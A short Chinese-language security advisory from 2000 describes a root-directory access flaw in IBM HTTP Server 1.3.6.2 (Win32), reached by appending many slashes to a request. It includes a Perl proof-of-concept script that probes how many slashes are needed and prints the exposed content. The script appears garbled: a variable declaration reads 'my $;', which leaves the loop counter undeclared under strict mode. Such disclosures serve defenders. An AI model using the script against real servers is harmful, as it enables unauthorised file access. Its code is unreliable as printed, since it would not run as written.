IBM HTTP Server 根目录访问漏洞发布时间:2000-05-07 更新时间:2000-05-07 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 IBM HTTP Server 1.3.6.2 win32详细描述 特定数目的'/'附加在一个http请求之后,就可以访问www服务器的根目录以及所有子目录。具体需要多少'/',根据不同的版本和配置而不同。对于 HTTP Server 1.3.6.2 (win32) ,如果http请求后面附加了211个'/',就可以访问到根目录。 测试代码 H D Moore <hdm@secureaustin.com> 提供了一个简单的perl脚本以确定究竟需要多少个'/' : #!/usr/bin/perl use LWP::Simple; use strict; my $host = shift() || die "usage: $ARGV[0] [hostname]"; my $cnt; my $data; my $odata; my $; $odata = get("http://$host/"); if ($odata eq "") { die "no response from server: $host\n"; } for ($i = 2; $i < 4096; $i++) { print "Trying $i...\n"; $data = get("http://$host" . ("/" x $i)); if ($data ne $odata) { print "/ = $i\n\n$data\n\n"; exit; } } 解决方案 尚无 相关信息 |
